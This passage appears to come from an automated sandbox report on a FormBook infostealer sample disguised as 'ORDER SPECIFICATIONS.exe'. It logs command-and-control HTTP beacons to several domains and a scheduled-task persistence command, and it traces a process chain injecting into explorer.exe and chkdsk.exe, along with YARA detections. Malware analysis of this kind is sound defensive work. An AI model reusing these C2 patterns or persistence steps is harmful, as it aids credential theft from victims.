2e 74 6f 53 74 72 69 6e 67 28 31 36 29 3b 7d 72 65 74 75 72 6e 20 76 61 6c 3b 7d 66 75 6e 63 74 69 6f 6e 20 59 75 6e 53 75 6f 41 75 74 6f 4a 75 6d 70 28 29 7b 20 76 61 72 20 77 69 64 74 68 20 3d 73 63 72 65 65 6e 2e 77 69 64 74 68 3b 20 76 61 72 20 68 65 69 67 68 74 3d 73 63 72 65 65 6e 2e 68 65 69 67 68 74 3b 20 76 61 72 20 73 63 72 65 65 6e 64 61 74 65 20 3d 20 77 69 64 74 68 20 2b 20 22 2c 22 20 2b 20 68 65 69 67 68 74 3b 76 61 72 20 63 75 72 6c 6f 63 61 74 69 6f 6e 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3b 69 66 28 2d 31 20 3d 3d 20 63 75 72 6c 6f 63 61 74 69 6f 6e 2e 69 6e 64 65 78 4f 66 28 22 73 65 63 75 72 69 74 79 5f 76 65 72 69 66 79 5f 22 29 29 7b 20 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 3d 22 73 72 63 75 72 6c 3d 22 20 2b 20 73 74 72 69 6e 67 54 6f 48 65 78 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 20 2b 20 22 3b 70 61 74 68 3d 2f 3b 22 3b 7d 73 65 6c 66 2e 6c 6f 63 61 74 69 6f 6e 20 3d 20 22 2f 6f 77 77 73 2f 3f 46 5a 41 3d 4c 4e 74 63 5a 34 6f 33 52 53 62 69 4d 33 71 31 58 50 35 20 33 71 50 58 78 46 64 57 43 51 4c 38 46 56 7a 65 68 44 68 7a 54 65 31 68 35 39 73 6a 7a 61 76 6b 73 77 4c 48 4d 72 4f 53 4e 32 57 52 79 4c 76 50 26 47 7a 72 58 3d 42 78 6f 30 73 72 63 26 73 65 63 75 72 69 74 79 5f 76 65 72 69 66 79 5f 64 61 74 61 3d 22 20 2b 20 73 74 72 69 6e 67 54 6f 48 65 78 28 73 63 72 65 65 6e 64 61 74 65 29 3b 7d 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 73 65 74 54 69 6d 65 6f 75 74 28 22 59 75 6e 53 75 6f 41 75 74 6f 4a 75 6d 70 28 29 22 2c 20 35 30 29 3b
                                                                                      Data Ascii: <!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/><meta http-equiv="Cache-Control" content="no-store, no-cache, must-revalidate, post-check=0, pre-check=0"/><meta http-equiv="Connection" content="Close"/><script type="text/javascript">function stringToHex(str){var val="";for(var i = 0; i < str.length; i++){if(val == "")val = str.charCodeAt(i).toString(16);else val += str.charCodeAt(i).toString(16);}return val;}function YunSuoAutoJump(){ var width =screen.width; var height=screen.height; var screendate = width + "," + height;var curlocation = window.location.href;if(-1 == curlocation.indexOf("security_verify_")){ document.cookie="srcurl=" + stringToHex(window.location.href) + ";path=/;";}self.location = "/owws/?FZA=LNtcZ4o3RSbiM3q1XP5 3qPXxFdWCQL8FVzehDhzTe1h59sjzavkswLHMrOSN2WRyLvP&GzrX=Bxo0src&security_verify_data=" + stringToHex(screendate);}</script><script>setTimeout("YunSuoAutoJump()", 50);


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      2192.168.2.54973134.102.136.18080C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Feb 23, 2021 08:57:55.635871887 CET5450OUTGET /owws/?FZA=lwHO/uUGh/aXRG65LDVUqOi7qNbSmHJrcCZCAEgZXo9YpRM01PmoothBQXBavnYq4fuq&GzrX=Bxo0src HTTP/1.1
                                                                                      Host: www.denisekohli.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Feb 23, 2021 08:57:55.775059938 CET5450INHTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Tue, 23 Feb 2021 07:57:55 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "603155b8-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      3192.168.2.549732156.240.32.11480C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Feb 23, 2021 08:58:01.264838934 CET5451OUTGET /owws/?FZA=4P1MPend6t3dRr+zrFZAhnBbaZyC76urNt6lzZx4zgRAaIR2wDCeIn43mJ71sHhZDUem&GzrX=Bxo0src HTTP/1.1
                                                                                      Host: www.hostsnc.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Feb 23, 2021 08:58:01.486218929 CET5451INHTTP/1.1 200 OK
                                                                                      Server: nginx
                                                                                      Date: Tue, 23 Feb 2021 07:57:09 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Vary: Accept-Encoding
                                                                                      Data Raw: 31 0d 0a 2e 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 1.0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      4192.168.2.54973413.57.130.12080C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Feb 23, 2021 08:58:06.798021078 CET5488OUTGET /owws/?FZA=tHbMDDeadmVNgKYcreuncRwf7boUCKl6MNzrWMM5Jrdb4IpAp8+CGbWYAVkD3n9oZQag&GzrX=Bxo0src HTTP/1.1
                                                                                      Host: www.assemble-4u.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Feb 23, 2021 08:58:07.001431942 CET5489INHTTP/1.1 301 Moved Permanently
                                                                                      Date: Tue, 23 Feb 2021 07:58:06 GMT
                                                                                      Server: Apache
                                                                                      Location: https://www.assemble-4u.com/owws/?FZA=tHbMDDeadmVNgKYcreuncRwf7boUCKl6MNzrWMM5Jrdb4IpAp8+CGbWYAVkD3n9oZQag&GzrX=Bxo0src
                                                                                      Content-Length: 331
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 73 73 65 6d 62 6c 65 2d 34 75 2e 63 6f 6d 2f 6f 77 77 73 2f 3f 46 5a 41 3d 74 48 62 4d 44 44 65 61 64 6d 56 4e 67 4b 59 63 72 65 75 6e 63 52 77 66 37 62 6f 55 43 4b 6c 36 4d 4e 7a 72 57 4d 4d 35 4a 72 64 62 34 49 70 41 70 38 2b 43 47 62 57 59 41 56 6b 44 33 6e 39 6f 5a 51 61 67 26 61 6d 70 3b 47 7a 72 58 3d 42 78 6f 30 73 72 63 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.assemble-4u.com/owws/?FZA=tHbMDDeadmVNgKYcreuncRwf7boUCKl6MNzrWMM5Jrdb4IpAp8+CGbWYAVkD3n9oZQag&amp;GzrX=Bxo0src">here</a>.</p></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      5192.168.2.54973554.85.86.21180C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Feb 23, 2021 08:58:12.204418898 CET5490OUTGET /owws/?FZA=Ng1hVjXym9Qjh/39zAZuuRZY5wWd2+1a+DNcin6p0h8GUL41G3Uc3DOSlbUNOeobFB2Q&GzrX=Bxo0src HTTP/1.1
                                                                                      Host: www.raphaelyejesiel.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Feb 23, 2021 08:58:12.338124037 CET5491INHTTP/1.1 200 OK
                                                                                      Date: Tue, 23 Feb 2021 07:58:12 GMT
                                                                                      Server: Apache
                                                                                      Set-Cookie: session=gshim4iannpbkjt0e93p1h8qjd; path=/; domain=.raphaelyejesiel.com; secure; SameSite=None
                                                                                      Vary: Accept-Encoding,User-Agent
                                                                                      Connection: close
                                                                                      Transfer-Encoding: chunked
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Data Raw: 37 33 63 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 2f 73 69 73 74 65 6d 61 2e 63 61 73 61 72 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 76 3d 32 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e c3 a3 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 7c 20 43 61 73 61 72 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 47 4d 78 74 6d 44 57 69 41 4f 76 2d 53 75 34 7a 39 2d 73 55 41 79 4a 4a 4e 55 47 74 6c 68 79 56 42 4d 75 42 61 33 43 31 66 71 73 22 20 2f 3e 0a 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 65 6d 62 65 64 2e 74 79 70 65 66 6f 72 6d 2e 63 6f 6d 2f 65 6d 62 65 64 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 21 2d 2d 20 48 54 4d 4c 35 20 53 68 69 6d 20 61 6e 64 20 52 65 73 70 6f 6e 64 2e 6a 73 20 49 45 38 20 73 75 70 70 6f 72 74 20 6f 66 20 48 54 4d 4c 35 20 65 6c 65 6d 65 6e 74 73 20 61 6e 64 20 6d 65 64 69 61 20 71 75 65 72 69 65 73 20 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6f 73 73 2e 6d 61 78 63 64 6e 2e 63 6f 6d 2f 6c 69 62 73 2f 68 74 6d 6c 35 73 68 69 76 2f 33 2e 37 2e 30 2f 68 74 6d 6c 35 73 68 69 76 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6f 73 73 2e 6d 61 78 63 64 6e 2e 63 6f 6d 2f 6c 69 62 73 2f 72 65 73 70 6f 6e 64 2e 6a 73 2f 31 2e 33 2e 30 2f 72 65 73 70 6f 6e 64 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 3c 21 2d 2d 20 6f 70 65 6e 20 67 72 61 70 68 20 2d 2d 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 43 61 73 61 72 2e 63 6f 6d 22 2f 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 73 69 74 65 22 3e 0a 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 66 62 3a 61 70 70 5f 69 64 22 20 63 6f 6e 74 65 6e 74 3d 22 36 32 31 33 35 32 38 33 37 39 35 37 37 33 36 22 2f 3e 0a 3c 21 2d 2d 20 65 6e 64 20 6f 70 65 6e 20 67 72 61 70 68 20 2d 2d 3e 0a 0a 0a 20 20 20 20 20 20 3c 21 2d 2d 20 67 6f 6f 67 6c 65 20 61 6e 61 6c 79 74 69 63 73 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 28 66 75 6e 63 74 69 6f 6e 28 69 2c 73 2c 6f 2c 67 2c 72 2c 61 2c 6d 29 7b 69 5b 27 47 6f 6f 67 6c 65 41 6e 61 6c 79
                                                                                      Data Ascii: 73c3<!DOCTYPE html><html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="shortcut icon" href="//sistema.casar.com/favicon.ico?v=2" /><title>Pgina no encontrada | Casar.com</title><meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="google-site-verification" content="GMxtmDWiAOv-Su4z9-sUAyJJNUGtlhyVBMuBa3C1fqs" /><script src="https://embed.typeform.com/embed.js"></script>... HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->...[if lt IE 9]> <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script> <script src="https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.js"></script><![endif]-->... open graph --> <meta property="og:site_name" content="Casar.com"/> <meta property="og:type" content="website"> <meta property="fb:app_id" content="621352837957736"/>... end open graph --> ... google analytics --><script> (function(i,s,o,g,r,a,m){i['GoogleAnaly


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      6192.168.2.54973634.90.54.23880C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Feb 23, 2021 08:58:17.613405943 CET5522OUTGET /owws/?FZA=wQPVVaqxY2IiVfQZkyRmW3q13fIzlgC5jJ34SIKwtgCZdzYlbOYBx3wkbgC3baC7Oc7O&GzrX=Bxo0src HTTP/1.1
                                                                                      Host: www.your-new-body-plan.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Feb 23, 2021 08:58:17.661597013 CET5522INHTTP/1.1 301 Moved Permanently
                                                                                      Server: nginx
                                                                                      Date: Tue, 23 Feb 2021 07:58:17 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 162
                                                                                      Connection: close
                                                                                      Location: https://www.your-new-body-plan.com/owws/?FZA=wQPVVaqxY2IiVfQZkyRmW3q13fIzlgC5jJ34SIKwtgCZdzYlbOYBx3wkbgC3baC7Oc7O&GzrX=Bxo0src
                                                                                      Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                                                      X-HTTPS-Enforce: 1
                                                                                      X-Proxy-Cache-Info: DT:1
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      7192.168.2.54973734.102.136.18080C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Feb 23, 2021 08:58:22.815170050 CET5524OUTGET /owws/?FZA=5jCx8TJ67BDPxitFKTiPzVbAv5V4WmfLvz0iUotKb81cdHhoP6D4U31cAoF9J0eWw3xa&GzrX=Bxo0src HTTP/1.1
                                                                                      Host: www.softwaresreports.info
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Feb 23, 2021 08:58:22.954349995 CET5524INHTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Tue, 23 Feb 2021 07:58:22 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "603155b8-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                      Code Manipulations

                                                                                      Statistics

                                                                                      Behavior

                                                                                      Click to jump to process

                                                                                      System Behavior

                                                                                      Analysis Process: ORDER SPECIFICATIONS.exe PID: 6336 Parent PID: 5596

                                                                                      General

                                                                                      Start time:08:56:47
                                                                                      Start date:23/02/2021
                                                                                      Path:C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe'
                                                                                      Imagebase:0x6a0000
                                                                                      File size:552448 bytes
                                                                                      MD5 hash:E75A4DF51162401B21C3EB79718FB3DB
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:.Net C# or VB.NET
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.254750109.0000000002AF1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.255037540.0000000003AF9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.255037540.0000000003AF9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.255037540.0000000003AF9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      Reputation:low

                                                                                      Analysis Process: schtasks.exe PID: 6476 Parent PID: 6336

                                                                                      General

                                                                                      Start time:08:56:56
                                                                                      Start date:23/02/2021
                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\LvZiFDk' /XML 'C:\Users\user\AppData\Local\Temp\tmpDA15.tmp'
                                                                                      Imagebase:0x1130000
                                                                                      File size:185856 bytes
                                                                                      MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Analysis Process: conhost.exe PID: 6484 Parent PID: 6476

                                                                                      General

                                                                                      Start time:08:56:56
                                                                                      Start date:23/02/2021
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7ecfc0000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Analysis Process: ORDER SPECIFICATIONS.exe PID: 6520 Parent PID: 6336

                                                                                      General

                                                                                      Start time:08:56:57
                                                                                      Start date:23/02/2021
                                                                                      Path:C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe
                                                                                      Imagebase:0x160000
                                                                                      File size:552448 bytes
                                                                                      MD5 hash:E75A4DF51162401B21C3EB79718FB3DB
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low

                                                                                      Analysis Process: ORDER SPECIFICATIONS.exe PID: 6552 Parent PID: 6336

                                                                                      General

                                                                                      Start time:08:56:57
                                                                                      Start date:23/02/2021
                                                                                      Path:C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe
                                                                                      Imagebase:0xac0000
                                                                                      File size:552448 bytes
                                                                                      MD5 hash:E75A4DF51162401B21C3EB79718FB3DB
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.298238768.0000000001420000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.298238768.0000000001420000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.298238768.0000000001420000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.297626446.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.297626446.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.297626446.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.298321628.0000000001450000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.298321628.0000000001450000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.298321628.0000000001450000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      Reputation:low

                                                                                      Analysis Process: explorer.exe PID: 3472 Parent PID: 6552

                                                                                      General

                                                                                      Start time:08:57:00
                                                                                      Start date:23/02/2021
                                                                                      Path:C:\Windows\explorer.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:
                                                                                      Imagebase:0x7ff693d90000
                                                                                      File size:3933184 bytes
                                                                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Analysis Process: chkdsk.exe PID: 6364 Parent PID: 3472

                                                                                      General

                                                                                      Start time:08:57:15
                                                                                      Start date:23/02/2021
                                                                                      Path:C:\Windows\SysWOW64\chkdsk.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\SysWOW64\chkdsk.exe
                                                                                      Imagebase:0x11d0000
                                                                                      File size:23040 bytes
                                                                                      MD5 hash:2D5A2497CB57C374B3AE3080FF9186FB
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.499636949.0000000005370000.00000040.00000001.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.499636949.0000000005370000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.499636949.0000000005370000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.499736122.00000000053A0000.00000004.00000001.sdmp, Author: Joe Security
